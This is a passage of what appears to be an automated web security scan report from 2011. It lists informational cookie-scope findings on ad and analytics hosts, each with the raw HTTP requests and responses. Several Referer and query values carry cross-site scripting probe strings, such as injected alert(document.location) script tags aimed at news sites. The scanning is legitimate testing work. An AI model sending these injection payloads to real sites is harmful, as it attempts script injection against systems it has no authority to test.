Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



10.30. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server


10.31. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.32. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.33. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.34. http://p.raasnet.com/partners/dfp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';

10.35. http://p.raasnet.com/partners/oxmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEV